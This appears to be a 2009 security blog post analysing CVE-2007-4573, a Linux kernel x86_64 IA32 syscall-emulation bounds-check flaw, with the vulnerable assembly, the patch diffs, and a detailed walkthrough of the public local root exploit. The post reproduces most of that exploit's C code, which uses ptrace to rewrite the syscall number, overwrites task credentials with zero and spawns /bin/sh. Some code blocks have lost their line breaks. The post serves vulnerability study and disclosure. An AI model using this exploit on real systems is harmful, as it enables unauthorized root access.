xorl %eax, %eax

CVE-2007-4573: Linux kernel IA32 System Call Emulation Vulnerability

leave a comment »

This is an old bug, but it is one of my favorite Linux kernel vulnerabilities. The bug was discovered and disclosed by cliph. It was present in the 2.4 as well as the 2.6 branches prior to the 2.6.22.7 release, but only on x86_64 architectures. Here is a code snippet from the 2.6.22 release of the Linux kernel.

sysenter_do_call:       
        cmpl    $(IA32_NR_syscalls-1),%eax
        ja      ia32_badsys
        IA32_ARG_FIXUP 1
        call    *ia32_sys_call_table(,%rax,8)

This assembly code resides at arch/x86_64/ia32/ia32entry.S and it is used to provide IA32 emulation on 64-bit architectures. This sysenter_do_call implementation first compares the contents of EAX with the length of the system call table to ensure that it is inside its bounds. If this fails it will jump to label ‘ia32_badsys’. Otherwise, it will execute the IA32_ARG_FIXUP macro, which moves the arguments from the registers used by the 32-bit system call convention (EBX, ECX, EDX, ESI, EDI, EBP) into the registers expected by the 64-bit calling convention (RDI, RSI, RDX, RCX, R8, R9) like this:

        .macro IA32_ARG_FIXUP noebp=0
        movl    %edi,%r8d
        .if \noebp
        .else
        movl    %ebp,%r9d
        .endif
        xchg    %ecx,%esi
        movl    %ebx,%edi
        movl    %edx,%edx       /* zero extension */
        .endm 

Finally, it calls the element of the system call table located at the offset given by the RAX register. The bounds check above only compares the 32-bit EAX, while the call is indexed by the full 64-bit RAX; since the upper 32 bits of RAX are not checked, RAX could contain values that are beyond the bounds of the system call table, as cliph noticed. The exact same vulnerability was also present at ‘cstar_do_call’ and ‘ia32_do_syscall’. The Linux kernel developers immediately released a new version after the disclosure of that bug: this was 2.6.22.7, which fixed just this bug, as we can read in its ChangeLog. The patch was written by Andi Kleen of SUSE and, specifically, what it did was add a new macro named LOAD_ARGS32 that loads the 32-bit registers like this:

 	.endm
 
+	.macro LOAD_ARGS32 offset
+	movl \offset(%rsp),%r11d
+	movl \offset+8(%rsp),%r10d
+	movl \offset+16(%rsp),%r9d
+	movl \offset+24(%rsp),%r8d
+	movl \offset+40(%rsp),%ecx
+	movl \offset+48(%rsp),%edx
+	movl \offset+56(%rsp),%esi
+	movl \offset+64(%rsp),%edi
+	movl \offset+72(%rsp),%eax
+	.endm
+	
 	.macro CFI_STARTPROC32 simple

This macro is then used instead of LOAD_ARGS to reload the arguments from the stack, in case they were changed using ptrace(2), like this:

@@ -152,7 +164,7 @@ sysenter_tracesys:
 	movq	$-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq	%rsp,%rdi        /* &pt_regs -> arg1 */
 	call	syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST
 	movl	%ebp, %ebp
 	/* no need to do an access_ok check here because rbp has been
@@ -255,7 +267,7 @@ cstar_tracesys:
 	movq $-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq %rsp,%rdi        /* &pt_regs -> arg1 */
 	call syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST
 	movl RSP-ARGOFFSET(%rsp), %r8d
 	/* no need to do an access_ok check here because r8 has been
@@ -334,7 +346,7 @@ ia32_tracesys:
 	movq $-ENOSYS,RAX(%rsp)	/* really needed? */
 	movq %rsp,%rdi        /* &pt_regs -> arg1 */
 	call syscall_trace_enter
-	LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+	LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
 	RESTORE_REST

Also, they changed arch/x86_64/kernel/ptrace.c’s putreg(), which is used to store a value in a register when using the ptrace(2) system call.

 	unsigned long tmp; 
 	
-	/* Some code in the 64bit emulation may not be 64bit clean.
-	   Don't take any chances. */
-	if (test_tsk_thread_flag(child, TIF_IA32))
-		value &= 0xffffffff;
 	switch (regno) {
 		case offsetof(struct user_regs_struct,fs):

test_tsk_thread_flag() tests whether the ‘child’ task has the ‘TIF_IA32’ flag set, which marks 32-bit processes.
Even though this sounds cool, the coolest part for that vulnerability (as in most cases as well) was its exploitation. Since there is already public exploit code I will discuss that one too. That public exploit for IA32 emulation bug was developed by Robert Swiecki, Przemyslaw Frasunek and Pawel Pisarczyk of ATM-Lab.
The exploit code features a function named docall(). This is used to mmap(2) a region of ‘size’ bytes at the user-specified location passed to it through the ‘ptr’ argument (rounded down to a page boundary), with read, write and execute permissions. Then, it has a for loop which fills that region with the address of the ‘kernelmodecode’ routine. Finally, it loads RAX with 0x101, which is the system call number of the remap_file_pages() system call, and performs the call using interrupt 0x80.

static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &euid, &suid);

uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}

for (; ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", 0); printf("no /bin/sh ??\n"); exit(0); } [/sourcecode] This should trigger the bug and make the kernel call through an entry in the newly mapped region, every slot of which holds the address of 'kernelmodecode'. This code is declared as a function which you can see here: [sourcecode language="c"] static void kernelmodecode(void) { int i; uint8_t *gs; uint32_t *ptr; asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs)); for (i = 200; i < 1000; i+=1) { ptr = (uint32_t*) (gs + i); if ((ptr[0] == uid) && (ptr[1] == euid) && (ptr[2] == suid) && (ptr[3] == uid)) { ptr[0] = 0; //UID ptr[1] = 0; //EUID ptr[2] = 0; //SUID break; } } } [/sourcecode] What it does is read the pointer stored at offset 0 of the GS segment and then scan the memory following it until it finds our UID at ptr[0], EUID at ptr[1], SUID at ptr[2] and UID at ptr[3]. We got those values in the docall() function using getresuid(), and they are ordered this way since (as we can read in include/linux/sched.h) the kernel structure task_struct, which describes a task, includes this: [sourcecode language="c"] struct task_struct { ... /* process credentials */ uid_t uid,euid,suid,fsuid; gid_t gid,egid,sgid,fsgid; ... } [/sourcecode] So, when it finds this structure of our task, it sets its credentials to zero and breaks. Now that we know the details, we can move to the core exploitation, which happens in the main() function. 
As you can see docall() is invoked like this: [sourcecode language="c"] int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } [/sourcecode] Using those offsets (which are definitely beyond what the 32-bit EAX register can hold), the call through the system call table ends up in the previously mmap(2)'d location. If we continue with main() we'll see this one: [sourcecode language="c"] if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", 0); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } [/sourcecode] This is simple child-spawning code: the child requests to be traced with PTRACE_TRACEME and then re-executes the same binary in order to trigger the call to docall(), which will only be called if main() is invoked with argc equal to 4 (the program name plus three arguments). Now, assuming that we have our parent/child processes we can move to this code: [sourcecode language="c"] for (;;) { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } [/sourcecode] These are some simple checks on the child process' status. First of all, it ignores status changes from any other processes it might have, then it checks whether the child has finished using WIFEXITED(), whether it is stopped and, finally, whether it was stopped by a signal other than SIGTRAP. 
Finally, this code takes place in main(): [sourcecode language="c"] rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for(;;) sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; } [/sourcecode] Variable 'rax' is initialized using PTRACE_PEEKUSER with the value of the ORIG_RAX slot (the system call number) of the child process. If that value is 0x000000000101, which is the system call number that was loaded in docall(), it will replace it using PTRACE_POKEUSER with 'off/8' (that is, 0x0000000800000101, computed from the previously calculated 'off') and flag 'set' will be set to 1. If now, variable 'rax' is 11 and 'set' flag is non-zero, it will detach from the process and consequently continue the execution from the 'int 0x80' part which will attempt to call through the system call table entry at index 0x0000000800000101 (byte offset 0x0000000800000101 * 8), which is where the pointers to 'kernelmodecode' reside. Hopefully, this will find the credentials, change them to 0 and then perform the execl("/bin/sh", "bin/sh", 0) call. Otherwise, it will resume the child using PTRACE_SYSCALL so that execution continues and stops again at the next system call. P.S.:

* nnp kind of wishes that xorl would go into more detail on the 
   exploits for interesting vulnerabilities, rather than just the vulns

You were right. I will write about exploits when there are public codes available. :)

Written by xorl

August 7, 2009 at 10:42

Posted in bugs, linux

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s